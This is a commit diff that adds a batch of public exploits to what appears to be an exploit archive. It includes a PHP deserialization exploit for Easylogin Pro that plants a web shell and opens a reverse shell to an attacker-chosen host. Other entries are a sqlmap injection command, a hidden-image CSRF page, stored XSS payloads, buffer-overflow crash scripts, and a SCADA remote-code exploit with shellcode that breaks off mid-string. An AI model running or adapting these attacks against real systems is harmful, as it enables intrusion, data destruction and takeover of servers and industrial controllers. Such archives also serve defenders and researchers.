DB: 2018-08-21
11 changes to exploits/shellcodes SEIG Modbus 3.4 - Denial of Service (PoC) Zortam MP3 Media Studio 23.95 - Denial of Service (PoC) Restorator 1793 - Denial of Service (PoC) Prime95 29.4b7 - Denial Of Service (PoC) SEIG SCADA System 9 - Remote Code Execution SEIG Modbus 3.4 - Remote Code Execution Easylogin Pro 1.3.0 - Encryptor.php Unserialize Remote Code Execution WordPress Plugin Chained Quiz 1.0.8 - 'answer' SQL Injection MyBB Moderator Log Notes Plugin 1.1 - Cross-Site Request Forgery WordPress Plugin Tagregator 0.6 - Cross-Site Scripting Countly - Persistent Cross-Site Scripting
This commit is contained in:
parent
f4745b8f85
commit
948806b29c
12 changed files with 737 additions and 0 deletions
377
exploits/php/remote/45227.php
Normal file
377
exploits/php/remote/45227.php
Normal file
|
@ -0,0 +1,377 @@
|
|||
#!/usr/bin/php
|
||||
<?php
|
||||
/*
|
||||
Easylogin Pro Encryptor.php Unserialize Remote Code Execution Vulnerability
|
||||
Version: 1.3.0
|
||||
Platform: Ubuntu Server 18.04.1
|
||||
|
||||
Bug found by: @f99942
|
||||
Tekniq/exploit by: @steventseeley (mr_me)
|
||||
CVE: CVE-2018-15576
|
||||
|
||||
Notes:
|
||||
======
|
||||
|
||||
- This is not really a security issue I guess, because you need to know the key.
|
||||
But a simple disclosure bug could mean its game over for Easylogin Pro
|
||||
- You will need PHP with threading support to run this exploit
|
||||
- Laravel + Guzzle === lol
|
||||
|
||||
Example:
|
||||
========
|
||||
|
||||
mr_me@pluto:~$ php -m | grep pthreads && php --version
|
||||
pthreads
|
||||
PHP 7.2.2 (cli) (built: Aug 10 2018 01:30:10) ( ZTS DEBUG )
|
||||
Copyright (c) 1997-2018 The PHP Group
|
||||
Zend Engine v3.2.0, Copyright (c) 1998-2018 Zend Technologies
|
||||
with Zend OPcache v7.2.2, Copyright (c) 1999-2018, by Zend Technologies
|
||||
|
||||
mr_me@pluto:~$ ./e.php
|
||||
|
||||
Easylogin Pro <= v1.3.0 Encryptor.php Unserialize Remote Code Execution Vulnerability
|
||||
Bug found by: @f99942
|
||||
Tekniq/exploit by: @steventseeley (mr_me)
|
||||
|
||||
----------------------------------------------------
|
||||
Usage: php ./e.php -t <ip> -c <ip:port>
|
||||
-t: target server (ip with or without port)
|
||||
-c: connectback server (ip and port)
|
||||
Example:
|
||||
php ./e.php -t 172.16.175.136 -c 172.16.175.137:1337
|
||||
----------------------------------------------------
|
||||
mr_me@pluto:~$ ./e.php -t 172.16.175.137 -c 172.16.175.136:1337
|
||||
|
||||
Easylogin Pro <= v1.3.0 Encryptor.php Unserialize Remote Code Execution Vulnerability
|
||||
bug found by: @f99942
|
||||
tekniq/exploit by: @steventseeley (mr_me)
|
||||
|
||||
(+) snap...
|
||||
(+) crackle...
|
||||
(+) pop!
|
||||
(+) connectback from 172.16.175.137 via port 41860
|
||||
|
||||
www-data@target:/var/www/html/uploads$ id;uname -a
|
||||
uid=33(www-data) gid=33(www-data) groups=33(www-data)
|
||||
Linux target 4.15.0-30-generic #32-Ubuntu SMP Thu Jul 26 17:42:43 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
|
||||
www-data@target:/var/www/html/uploads$ ls -la
|
||||
total 12
|
||||
drwxrwxrwx 2 www-data www-data 4096 Aug 12 23:06 .
|
||||
drwxr-xr-x 9 www-data www-data 4096 Aug 9 14:49 ..
|
||||
-rwxrwxrwx 1 root root 13 Dec 12 2017 .gitignore
|
||||
www-data@target:/var/www/html/uploads$ php --version
|
||||
PHP 7.2.7-0ubuntu0.18.04.2 (cli) (built: Jul 4 2018 16:55:24) ( NTS )
|
||||
Copyright (c) 1997-2018 The PHP Group
|
||||
Zend Engine v3.2.0, Copyright (c) 1998-2018 Zend Technologies
|
||||
with Zend OPcache v7.2.7-0ubuntu0.18.04.2, Copyright (c) 1999-2018, by Zend Technologies
|
||||
www-data@target:/var/www/html/uploads$
|
||||
*/
|
||||
|
||||
namespace GuzzleHttp\Cookie;
|
||||
|
||||
// change these to work against your target
|
||||
$key = "OPudCtPyxzAGw8LkQowOoQAc88dvULGB";
|
||||
$path = "/var/www/html";
|
||||
|
||||
class Encrypter {
|
||||
protected $key;
|
||||
protected $cipher;
|
||||
|
||||
public function __construct($key, $cipher = 'AES-256-CBC'){
|
||||
$key = (string) $key;
|
||||
$this->key = $key;
|
||||
$this->cipher = $cipher;
|
||||
}
|
||||
|
||||
public function encrypt($value, $serialize = true){
|
||||
$iv = random_bytes(openssl_cipher_iv_length($this->cipher));
|
||||
$value = openssl_encrypt(
|
||||
$serialize ? serialize($value) : $value,
|
||||
$this->cipher, $this->key, 0, $iv
|
||||
);
|
||||
if ($value === false) {
|
||||
throw new EncryptException('Could not encrypt the data.');
|
||||
}
|
||||
$mac = $this->hash($iv = base64_encode($iv), $value);
|
||||
$json = json_encode(compact('iv', 'value', 'mac'));
|
||||
if (json_last_error() !== JSON_ERROR_NONE) {
|
||||
throw new EncryptException('Could not encrypt the data.');
|
||||
}
|
||||
return base64_encode($json);
|
||||
}
|
||||
|
||||
public function encryptString($value){
|
||||
return $this->encrypt($value, false);
|
||||
}
|
||||
|
||||
protected function hash($iv, $value){
|
||||
return hash_hmac('sha256', $iv.$value, $this->key);
|
||||
}
|
||||
}
|
||||
|
||||
// pop chain
|
||||
interface ToArrayInterface {}
|
||||
|
||||
class SetCookie implements ToArrayInterface {
|
||||
private $data;
|
||||
|
||||
public function __construct(array $data = []){
|
||||
$this->data = $data;
|
||||
}
|
||||
}
|
||||
|
||||
class CookieJar implements ToArrayInterface {
|
||||
private $cookies;
|
||||
|
||||
public function setCookie(SetCookie $cookie){
|
||||
$this->cookies = array($cookie);
|
||||
}
|
||||
}
|
||||
|
||||
class FileCookieJar extends CookieJar {
|
||||
private $filename;
|
||||
|
||||
public function __construct($bd_file, $cbh, $cbp){
|
||||
$this->filename = $bd_file;
|
||||
$this->setCookie(new SetCookie(array(
|
||||
"Value" => '<?php eval(base64_decode($_SERVER[HTTP_SI])); ?>',
|
||||
"Expires" => true,
|
||||
"Discard" => false,
|
||||
)));
|
||||
}
|
||||
}
|
||||
|
||||
class Exploit{
|
||||
private $target;
|
||||
private $targetport;
|
||||
private $cbhost;
|
||||
private $cbport;
|
||||
private $key;
|
||||
private $path;
|
||||
|
||||
public function __construct($t, $tp, $cbh, $cbp, $k, $p){
|
||||
$this->target = $t;
|
||||
$this->targetport = $tp;
|
||||
$this->cbhost = $cbh;
|
||||
$this->cbport = $cbp;
|
||||
$this->key = $k;
|
||||
$this->path = $p;
|
||||
}
|
||||
|
||||
public function run(){
|
||||
|
||||
// its possible to leak the path if app.php contains 'debug' => true
|
||||
// also, uploads is writable by default for avatars
|
||||
$fcj = new FileCookieJar("$this->path/uploads/si.php", $this->cbhost, $this->cbport);
|
||||
$e = new Encrypter($this->key);
|
||||
$this->p = $e->encryptString(serialize($fcj));
|
||||
|
||||
// hardcoded md5 of the class name 'Hazzard\Auth\Auth' for the cookie login
|
||||
$c = $this->do_get("index.php", array("Cookie: login_ac5456751dd3c394383a14228642391e=$this->p"));
|
||||
if ($c === 500){
|
||||
print "(+) pop!\r\n";
|
||||
|
||||
// start our listener
|
||||
$s = new Shell($this->cbport);
|
||||
$s->start();
|
||||
|
||||
// msf reverse shell with some stuff modified
|
||||
$rs = <<<'PHP'
|
||||
@error_reporting(-1);
|
||||
@set_time_limit(0);
|
||||
@ignore_user_abort(1);
|
||||
$dis=@ini_get('disable_functions');
|
||||
if(!empty($dis)){
|
||||
$dis=preg_replace('/[, ]+/', ',', $dis);
|
||||
$dis=explode(',', $dis);
|
||||
$dis=array_map('trim', $dis);
|
||||
}else{
|
||||
$dis=array();
|
||||
}
|
||||
$ipaddr='[cbhost]';
|
||||
$port=[cbport];
|
||||
function PtdSlhY($c){
|
||||
global $dis;
|
||||
if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) {
|
||||
$c=$c." 2>&1\n";
|
||||
}
|
||||
ob_start();
|
||||
system($c);
|
||||
$o=ob_get_contents();
|
||||
ob_end_clean();
|
||||
if (strlen($o) === 0){
|
||||
$o = "NULL";
|
||||
}
|
||||
return $o;
|
||||
}
|
||||
// we disappear like a fart in the wind
|
||||
@unlink("si.php");
|
||||
$nofuncs='no exec functions';
|
||||
$s=@fsockopen("tcp://$ipaddr",$port);
|
||||
while($c=fread($s,2048)){
|
||||
$out = '';
|
||||
if(substr($c,0,3) == 'cd '){
|
||||
chdir(substr($c,3,-1));
|
||||
}else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
|
||||
break;
|
||||
}else{
|
||||
$out=PtdSlhY(substr($c,0,-1));
|
||||
if($out===false){
|
||||
fwrite($s, $nofuncs);
|
||||
break;
|
||||
}
|
||||
}
|
||||
fwrite($s,$out);
|
||||
}
|
||||
fclose($s);
|
||||
PHP;
|
||||
$rs = str_replace("[cbhost]", $this->cbhost, $rs);
|
||||
$rs = str_replace("[cbport]", $this->cbport, $rs);
|
||||
$php = base64_encode($rs);
|
||||
$this->do_get("uploads/si.php", array("si: $php"));
|
||||
}
|
||||
}
|
||||
|
||||
private function do_get($p = "index.php", array $h = []){
|
||||
$curl = curl_init();
|
||||
curl_setopt_array($curl, array(
|
||||
CURLOPT_RETURNTRANSFER => 1,
|
||||
CURLOPT_URL => "http://$this->target/$p",
|
||||
CURLOPT_HTTPHEADER => $h,
|
||||
CURLOPT_PORT => (int) $this->targetport
|
||||
));
|
||||
$resp = curl_exec($curl);
|
||||
return curl_getinfo($curl, CURLINFO_HTTP_CODE);
|
||||
}
|
||||
}
|
||||
|
||||
class Shell extends \Thread{
|
||||
private $cbport;
|
||||
|
||||
public function __construct($cbp){
|
||||
$this->cbport = $cbp;
|
||||
}
|
||||
|
||||
public function run(){
|
||||
$sock = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
|
||||
$ret = @socket_bind($sock, 0, (int) $this->cbport);
|
||||
$ret = @socket_listen($sock, 5);
|
||||
$msgsock = @socket_accept($sock);
|
||||
@socket_close($sock);
|
||||
$start = true;
|
||||
$fp = fopen("php://stdin", "r");
|
||||
while(false !== @socket_select($r = array($msgsock))){
|
||||
if ($start === true){
|
||||
if (socket_getpeername($r[0], $a, $p) === true){
|
||||
print "(+) connectback from $a via port $p\r\n";
|
||||
$s = $this->exec_cmd($msgsock, "echo `whoami`@`hostname`:\n");
|
||||
}
|
||||
}
|
||||
$start = false;
|
||||
|
||||
// the pretty shells illusion
|
||||
print "\r\n".$s.$this->exec_cmd($msgsock, "echo `pwd`\n")."$ ";
|
||||
|
||||
// get our command...
|
||||
$c = fgets($fp);
|
||||
|
||||
// if the attacker enters nothing, continue...
|
||||
if (strpos("\n", $c) === 0){
|
||||
continue;
|
||||
}
|
||||
if (strpos($c, "cd") === false){
|
||||
print $this->exec_cmd($msgsock, $c);
|
||||
}elseif (strpos($c, "cd") !== false){
|
||||
$this->exec_cmd($msgsock, $c, false);
|
||||
}
|
||||
if(in_array($c, array("exit\n", "quit\n"))){
|
||||
break;
|
||||
}
|
||||
}
|
||||
fclose($fp);
|
||||
}
|
||||
|
||||
private function exec_cmd($c, $cmd, $ret=true){
|
||||
|
||||
// send our command to the reverse shell
|
||||
@socket_write($c, $cmd, strlen($cmd));
|
||||
|
||||
if ($ret == true){
|
||||
// we don't care to get the shell prompt back...
|
||||
$resp = trim(@socket_read($c, 2048, PHP_BINARY_READ));
|
||||
if ($resp === "NULL"){
|
||||
return "";
|
||||
}else{
|
||||
return $resp;
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
print_r("\r\nEasylogin Pro <= v1.3.0 Encryptor.php Unserialize Remote Code Execution Vulnerability
|
||||
Bug found by: @f99942
|
||||
Tekniq/exploit by: @steventseeley (mr_me)\r\n");
|
||||
|
||||
if ($argc < 3) {
|
||||
print_r("
|
||||
----------------------------------------------------
|
||||
Usage: php ".$argv[0]." -t <ip> -c <ip:port>
|
||||
-t: target server (ip with or without port)
|
||||
-c: connectback server (ip and port)
|
||||
Example:
|
||||
php ".$argv[0]." -t 172.16.175.136 -c 172.16.175.137:1337
|
||||
----------------------------------------------------
|
||||
"); die; }
|
||||
|
||||
function set_args($argv) {
|
||||
$_ARG = array();
|
||||
foreach ($argv as $arg) {
|
||||
if (preg_match("/--([^=]+)=(.*)/", $arg, $reg)) {
|
||||
$_ARG[$reg[1]] = $reg[2];
|
||||
} elseif(preg_match("/^-([a-zA-Z0-9])/", $arg, $reg)) {
|
||||
$_ARG[$reg[1]] = "true";
|
||||
} else {
|
||||
$_ARG["input"][] = $arg;
|
||||
}
|
||||
}
|
||||
return $_ARG;
|
||||
}
|
||||
|
||||
$args = set_args($argv);
|
||||
$host = $args["input"]["1"];
|
||||
$cbsp = $args["input"]["2"];
|
||||
|
||||
if (strpos($host, ":") == true){
|
||||
$host_and_port = explode(":", $host);
|
||||
$host = $host_and_port[0];
|
||||
$port = $host_and_port[1];
|
||||
}else{
|
||||
$port = 80;
|
||||
}
|
||||
|
||||
if (strpos($cbsp, ":") == true){
|
||||
$cbhost_and_cbport = explode(":", $cbsp);
|
||||
$cbhost = $cbhost_and_cbport[0];
|
||||
$cbport = $cbhost_and_cbport[1];
|
||||
}else{
|
||||
$cbport = 1337;
|
||||
}
|
||||
|
||||
$ip_regex = "(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b)";
|
||||
if ((preg_match($ip_regex, $host) === 1) && (preg_match($ip_regex, $cbhost) === 1)){
|
||||
|
||||
// exploit entry
|
||||
$poc = new Exploit($host, $port, $cbhost, $cbport, $key, $path);
|
||||
print "\r\n(+) snap...\r\n(+) crackle...\r\n";
|
||||
$poc->run();
|
||||
}
|
||||
/*
|
||||
eyJpdiI6InFGcWFDMW9aMEFwWmo2XC9RRkhxZ3JBPT0iLCJ2YWx1ZSI6IjdpVExUQWpaYVpu
|
||||
RjVVRElxczg1YUVpSWl2bEtXOVwvY3BVaDFkc0NNY0Y4NkhMME9XNE9PZHJxc0FhUFBlenpi
|
||||
VWtJSUNHWE9RYU5MQjVnOUgzUkt4RGc0QlE4TDNZSnpueFZlblVjM3NnVXFmeE0zSnZaRFA2
|
||||
a2gxU1l2QlVYNW5pUkZEd3c2RFJWYnpqRFkyUmdOQW5vZkVtaFA0Y2JDRW1kUU5mNWtGdmh3
|
||||
WDJWYlBmQU0rTkFwWExQOERWcEZDVTYzU255VEFaTzN4MzhZTEUxWElRbnNCZ1grWm9rN3Vh
|
||||
MzBzSnYrSGpjMmlRRWMxZWVTbDVhN29uOG1RazBJIiwibWFjIjoiOThmYTM5ZDc3M2FlMGVh
|
||||
NTI3ZWI2ZGNkODQ5N2ZmZmExNDA3YjdjYzYzMGRlODY3NDZmMjRkYTBiNmVjMGJmMCJ9
|
||||
*/
|
||||
?>
|
21
exploits/php/webapps/45221.txt
Normal file
21
exploits/php/webapps/45221.txt
Normal file
|
@ -0,0 +1,21 @@
|
|||
# Exploit Title: WordPress Plugin Chained Quiz 1.0.8 - 'answer' SQL Injection
|
||||
# Exploit Author: Çlirim Emini
|
||||
# Website: https://www.sentry.co.com
|
||||
# Software Link: https://wordpress.org/plugins/chained-quiz/
|
||||
# Version/s: 1.0.8 and below
|
||||
# Patched Version: 1.0.9
|
||||
# CVE : N/A
|
||||
# WPVULNDB: https://wpvulndb.com/vulnerabilities/9112
|
||||
|
||||
# Vulnerability Description:
|
||||
# WordPress Plugin Plugin Chained Quiz before 1.0.9 allows remote unauthenticated
|
||||
# users to execute arbitrary SQL commands via the 'answer' and 'answers' parameters.
|
||||
|
||||
# Technical details:
|
||||
# Chained Quiz appears to be vulnerable to time-based SQL-Injection.
|
||||
# The issue lies on the $answer backend variable.
|
||||
# Privileges required: None
|
||||
|
||||
# Proof of Concept (PoC):
|
||||
|
||||
sqlmap -u "http://target/wp-admin/admin-ajax.php" --data="answer=1*&question_id=1&quiz_id=1&post_id=1&question_type=radio&points=0&action=chainedquiz_ajax&chainedquiz_action=answer&total_questions=1" --dbms=MySQL --technique T
|
29
exploits/php/webapps/45224.txt
Normal file
29
exploits/php/webapps/45224.txt
Normal file
|
@ -0,0 +1,29 @@
|
|||
# Exploit Title: MyBB Moderator Log Notes Plugin 1.1 - Cross-Site Request Forgery
|
||||
# Date: 2018-05-17
|
||||
# Author: 0xB9
|
||||
# Twitter: @0xB9Sec
|
||||
# Software Link: https://community.mybb.com/mods.php?action=view&pid=1105
|
||||
# Version: 1.1
|
||||
# Tested on: Ubuntu 18.04
|
||||
|
||||
# 1. Description:
|
||||
# The plugin allows moderators to save notes and display them in a list in the modCP.
|
||||
# The CSRF allows an attacker to remotely delete all mod notes and mod note logs
|
||||
# in the modCP & ACP.
|
||||
|
||||
# 2. Proof of Concept:
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<-- Deletes mod note logs -->
|
||||
<img style="display:none" src="http://localhost/mybb15/admin/index.php?module=tools-modnoteslog&action=dal" alt="">
|
||||
<-- Deletes mod notes -->
|
||||
<img style="display:none" src="http://localhost/mybb15/admin/index.php?module=tools-modnoteslog&action=dmn" alt="">
|
||||
|
||||
<!-- You can also delete notes individually by the nid (note ID)
|
||||
<img style="display:none" src="http://localhost/mybb15/modcp.php?action=deletenote&nid=3" alt="">
|
||||
<img style="display:none" src="http://localhost/mybb15/modcp.php?action=deletenote&nid=2" alt="">
|
||||
<img style="display:none" src="http://localhost/mybb15/modcp.php?action=deletenote&nid=1" alt="">
|
||||
-->
|
||||
</body>
|
||||
</html>
|
23
exploits/php/webapps/45225.txt
Normal file
23
exploits/php/webapps/45225.txt
Normal file
|
@ -0,0 +1,23 @@
|
|||
# Exploit Title: WordPress Plugin Tagregator 0.6 - Cross-Site Scripting
|
||||
# Date: 2018-05-05
|
||||
# Exploit Author: ManhNho
|
||||
# Vendor Homepage: https://wordpress.org/plugins/tagregator/
|
||||
# Software Link: https://downloads.wordpress.org/plugin/tagregator.0.6.zip
|
||||
# Ref: https://pastebin.com/ZGr5tyP2
|
||||
# Version: 0.6
|
||||
# Tested on: CentOS 6.5
|
||||
# CVE : CVE-2018-10752
|
||||
# Category : Webapps
|
||||
|
||||
# 1. Description
|
||||
# WordPress Plugin Tagregator 0.6 - Stored XSS
|
||||
|
||||
# 2. Proof of Concept
|
||||
|
||||
1. Login to admin panel
|
||||
2. Access to Wordpress Tagregator setting, then choose Tweets/Instagram
|
||||
Media/Flickr Post/Google+ Activities and click "Add New" button
|
||||
3. In title field, inject XSS pattern such as:
|
||||
<script>alert('xss')</script> and click Preview button
|
||||
4. This site will response url that will alert popup named xss
|
||||
5. Send this xss url to another administrators, we have same alert
|
34
exploits/php/webapps/45228.txt
Normal file
34
exploits/php/webapps/45228.txt
Normal file
|
@ -0,0 +1,34 @@
|
|||
############################################################################
|
||||
# Exploit Title: Countly-server Stored(Persistent) XSS Vulnerability
|
||||
# Date: Monday - 2018 13 August
|
||||
# Author: 10:10AM Team
|
||||
# Discovered By: Sleepy
|
||||
# Software Link: https://github.com/Countly/countly-server
|
||||
# Version: All Version
|
||||
# Category: Web-apps
|
||||
# Security Risk: Critical
|
||||
# Tested on: GNU/Linux Ubuntu 16.04 - win 10
|
||||
############################################################################
|
||||
# Exploit:
|
||||
# Description:
|
||||
#
|
||||
# Attacker can use multiple parameters in the provided link to inject his own data in the database
|
||||
# of this application,the injected data can then be directly viewed in the event logs panel
|
||||
# (manage>logger).
|
||||
# Attacker may use this vulnerability to inject his own payload for attacks like Stored XSS.
|
||||
# The injected payload will be executed everytime that the target page gets visited/refreshed.
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# Injection URL:
|
||||
#
|
||||
# <20> http://[server_ip]:[api_port]/i?api_key=[api_key]¶meter_1=[payload_1]¶meter_2=[payload_2]&etc...
|
||||
#
|
||||
# Execution URL(login to server dashboard and navigate to "event logs" panel):
|
||||
#
|
||||
# <20> http://[server_ip]:[server_port]/dashboard#/[app_key]/manage/logger
|
||||
#
|
||||
#
|
||||
############################################################################
|
||||
# WE ARE: Sleepy({ssleeppyy@gmail.com}), Mikili({mikili.land@gmail.com})
|
||||
############################################################################
|
25
exploits/windows_x86-64/dos/45222.py
Executable file
25
exploits/windows_x86-64/dos/45222.py
Executable file
|
@ -0,0 +1,25 @@
|
|||
# Exploit Title: Zortam MP3 Media Studio 23.95 - Denial of Service (PoC)
|
||||
# Author: Gionathan "John" Reale
|
||||
# Discovey Date: 2018-08-19
|
||||
# Homepage: https://www.zortam.com
|
||||
# Software Link: https://www.zortam.com/download.html
|
||||
# Tested Version: 23.95
|
||||
# Tested on OS: Windows 7 x64
|
||||
# Steps to Reproduce: Run the python exploit script, it will create a new
|
||||
# file with the name "exploit.txt" just copy the text inside "exploit.txt"
|
||||
# and start the program. Once inside of the program click "Continue". In the new window paste the content of
|
||||
# "exploit.txt" into the following field: "Select". Click "Ok" and you will see a crash.
|
||||
|
||||
#!/usr/bin/python
|
||||
|
||||
buffer = "A" * 2000
|
||||
|
||||
payload = buffer
|
||||
try:
|
||||
f=open("exploit.txt","w")
|
||||
print "[+] Creating %s bytes evil payload.." %len(payload)
|
||||
f.write(payload)
|
||||
f.close()
|
||||
print "[+] File created!"
|
||||
except:
|
||||
print "File cannot be created"
|
25
exploits/windows_x86-64/dos/45223.py
Executable file
25
exploits/windows_x86-64/dos/45223.py
Executable file
|
@ -0,0 +1,25 @@
|
|||
# Exploit Title: Restorator 1793 - Denial of Service (PoC)
|
||||
# Author: Gionathan "John" Reale
|
||||
# Discovey Date: 2018-08-19
|
||||
# Homepage: https://www.bome.com/
|
||||
# Software Link: https://www.bome.com/bome/downloads/Restorator2018_Full_1793.exe
|
||||
# Tested Version: v1793
|
||||
# Tested on OS: Windows 7 x64
|
||||
# Steps to Reproduce: Run the python exploit script, it will create a new
|
||||
# file with the name "exploit.txt" just copy the text inside "exploit.txt"
|
||||
# and start the program. In the new window paste the content of
|
||||
# "exploit.txt" into the following field: "Name". Click "Ok" and you will see a crash.
|
||||
|
||||
#!/usr/bin/python
|
||||
|
||||
buffer = "A" * 4000
|
||||
|
||||
payload = buffer
|
||||
try:
|
||||
f=open("exploit.txt","w")
|
||||
print "[+] Creating %s bytes evil payload.." %len(payload)
|
||||
f.write(payload)
|
||||
f.close()
|
||||
print "[+] File created!"
|
||||
except:
|
||||
print "File cannot be created"
|
31
exploits/windows_x86/dos/45219.py
Executable file
31
exploits/windows_x86/dos/45219.py
Executable file
|
@ -0,0 +1,31 @@
|
|||
# Title: SEIG Modbus 3.4 - Denial of Service (PoC)
|
||||
# Author: Alejandro Parodi
|
||||
# Date: 2018-08-17
|
||||
# Vendor Homepage: https://www.schneider-electric.com
|
||||
# Software Link: https://github.com/hdbreaker/Ricnar-Exploit-Solutions/tree/master/Medium/CVE-2013-0662-SEIG-Modbus-Driver-v3.34/VERSION%203.4
|
||||
# Version: v3.4
|
||||
# Tested on: Windows7 x86
|
||||
# CVE: CVE-2013-0662
|
||||
# References:
|
||||
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0662
|
||||
|
||||
import socket
|
||||
import struct
|
||||
import time
|
||||
|
||||
ip = "192.168.127.137"
|
||||
port = 27700
|
||||
con = (ip, port)
|
||||
|
||||
header_padding = "\x00\xAA"
|
||||
header_buffer_size = "\xFF\xFF"
|
||||
header_recv_len = "\x08\xDD" #(header_buffer_size + 1 en el ultimo byte por que se le resta uno)
|
||||
header_end = "\xFF"
|
||||
|
||||
header = header_padding + header_buffer_size + header_recv_len + header_end
|
||||
message = "\x00\x64" + "A" * 2267
|
||||
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect(con)
|
||||
s.send(header)
|
||||
s.send(message)
|
29
exploits/windows_x86/dos/45226.py
Executable file
29
exploits/windows_x86/dos/45226.py
Executable file
|
@ -0,0 +1,29 @@
|
|||
# Exploit Title: Prime95 29.4b7 - Denial Of Service (PoC)
|
||||
# Author: Gionathan "John" Reale
|
||||
# Discovey Date: 2018-08-20
|
||||
# Homepage: http://www.mersenne.org
|
||||
# Software Link: http://www.mersenne.org/ftp_root/gimps/p95v294b7.win32.zip
|
||||
# Tested Version: 29.4b7
|
||||
# Tested on OS: Windows 7 32-bit
|
||||
|
||||
# Steps to Reproduce: Run the python exploit script, it will create a new
|
||||
# file with the name "exploit.txt" just copy the text inside "exploit.txt"
|
||||
# and start the program.
|
||||
# In the new window click "Test" > "PrimeNet" > "Connection..".
|
||||
# Now enter some test information into the fields until you reach the last field.
|
||||
# Paste the content of "exploit.txt" into the last field: "Optional proxy password".
|
||||
# Click "Ok" > "Ok" and you will see a crash.
|
||||
|
||||
#!/usr/bin/python
|
||||
|
||||
buffer = "A" * 6000
|
||||
|
||||
payload = buffer
|
||||
try:
|
||||
f=open("exploit.txt","w")
|
||||
print "[+] Creating %s bytes evil payload.." %len(payload)
|
||||
f.write(payload)
|
||||
f.close()
|
||||
print "[+] File created!"
|
||||
except:
|
||||
print "File cannot be created"
|
67
exploits/windows_x86/remote/45218.py
Executable file
67
exploits/windows_x86/remote/45218.py
Executable file
|
@ -0,0 +1,67 @@
|
|||
# Title: SEIG SCADA SYSTEM 9 - Remote Code Execution
|
||||
# Author: Alejandro Parodi
|
||||
# Date: 2018-08-17
|
||||
# Vendor Homepage: https://www.schneider-electric.com
|
||||
# Software Link: https://www.schneider-electric.ie/en/download/document/V9_Full_installation_package_register_and_receive_file/
|
||||
# Version: v9
|
||||
# Tested on: Windows7 x86
|
||||
# CVE: CVE-2013-0657
|
||||
# References:
|
||||
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0657
|
||||
|
||||
import socket
|
||||
import struct
|
||||
|
||||
ip = "192.168.0.23"
|
||||
port = 12397
|
||||
con = (ip, port)
|
||||
|
||||
# DoS Payload found in the research (CRUNCHBASE UNEXPECTED PARAMETER)
|
||||
# length = "\x00\x70\x00\x00\x00\x00\x00\x00"
|
||||
# message = "\x00\x70AA\x65\x00\x00\x00AAAAAAAAAAAAAAAA\x00\x00\x00\x00"+"B"*28644
|
||||
# payload = length+message
|
||||
|
||||
# Exploit Magic
|
||||
message_header = struct.pack("<L", 0x6014) + "\x66\x66\x07\x00"
|
||||
message_protocol_data = "\x10\x00\x00\x00" + "\x19" + "\x00\x00\x00\x00\x00" + "\x04" + "\x00\x00\x00" + struct.pack(">H", 0x6000)
|
||||
padding = "B" * 3344
|
||||
eip_safeseh_bypass_address = struct.pack("<L", 0x0F9C520B) # pop, pop, ret to stack payload in exprsrv.dll (Windows Library without SafeSEH)
|
||||
|
||||
# Shellcode: ./msfvenom -a x86 --platform windows -p windows/exec cmd=calc EXITFUNC=thread -e x86/shikata_ga_nai -i 5 -b '\x00\xFF\x0A\x0D' -f python
|
||||
# If EXITFUNC is not defined the application enter in a Loop that kill the VM resources
|
||||
nopsleed = "\x41"*100 # \x90 bad char bypass
|
||||
shellcode = "\xda\xcb\xbd\x0f\x83\x69\x70\xd9\x74\x24\xf4\x58\x31"
|
||||
shellcode += "\xc9\xb1\x4b\x83\xe8\xfc\x31\x68\x14\x03\x68\x1b\x61"
|
||||
shellcode += "\x9c\xa9\xcf\xd8\x3a\xb3\x6e\xfc\x1c\x37\x54\xf6\xc7"
|
||||
shellcode += "\x93\x5d\x47\xb3\xd2\x35\xb1\x3f\x7d\xdc\x42\xd7\x81"
|
||||
shellcode += "\x59\x48\x93\x7b\x98\x70\x2a\x6b\x98\x14\xea\xc5\x54"
|
||||
shellcode += "\x17\x7c\x8d\x25\x69\x60\x27\x1e\xc7\x8a\x6a\xd8\xcf"
|
||||
shellcode += "\xb6\xc3\x9d\x5a\x83\xd6\xea\x88\x14\x7d\x5a\x55\x71"
|
||||
shellcode += "\x90\x85\xb8\x37\x9e\x3e\xd7\x1a\x76\xf8\xb1\xb9\x63"
|
||||
shellcode += "\xb7\xef\xa3\xa6\xc0\xb8\x12\xb4\x18\x62\x1a\xe1\x9e"
|
||||
shellcode += "\x6f\x7e\xa2\x86\x6c\xf7\x3a\x31\xbd\x55\x42\x10\xad"
|
||||
shellcode += "\x89\x16\xa0\xb8\x6a\xd6\x4c\x20\xd9\xad\x81\x58\x77"
|
||||
shellcode += "\x0b\xa3\xaa\xba\x2c\x49\xf0\x26\xaa\xab\xce\x5a\xc3"
|
||||
shellcode += "\x41\x69\x60\xc4\x58\x71\x71\x9c\x3f\xbe\xc2\xbc\x49"
|
||||
shellcode += "\xdd\xab\x89\xf0\x46\xcb\x1a\x8a\xf1\xdb\xe5\x54\x1f"
|
||||
shellcode += "\xfb\x30\x3b\xb1\x17\x97\xb2\x3e\x31\xf8\x26\x13\x9c"
|
||||
shellcode += "\x16\xdd\x26\x7a\xe3\x9b\x6e\x29\x77\x49\xc7\x97\x98"
|
||||
shellcode += "\x39\x7b\x5f\xcd\xeb\x4a\x39\x6e\x66\x04\xbc\x6c\xa6"
|
||||
shellcode += "\x87\x01\x63\x4d\xf3\x35\xc9\x74\x35\xdf\xe7\x1f\x0c"
|
||||
shellcode += "\xd0\x69\x80\x8c\x5c\xde\x63\xfc\x19\x1b\x8e\x24\x3b"
|
||||
shellcode += "\x7e\x01\x97\x6f\x67\x8f\x07\x3f\x32\x13\x23\x80\x7e"
|
||||
shellcode += "\x9a\x01\x5a\xc0\x3c\xf9\xf5\x5a\x04\xb0\x54\x46\x0c"
|
||||
shellcode += "\xfb\x21\x4d\xd7\xe0\xb4\x02\xe5\x4c\x04\x5a\x5e\x37"
|
||||
shellcode += "\xd1\x61\x6d\xe1\x4d\xe8\xa8\xdf\x26\xdb\x55\x5a\x60"
|
||||
shellcode += "\x85\x68\x05\x6a\x21\x73\xdf\x73\xa4\xef\x26\x02\x7e"
|
||||
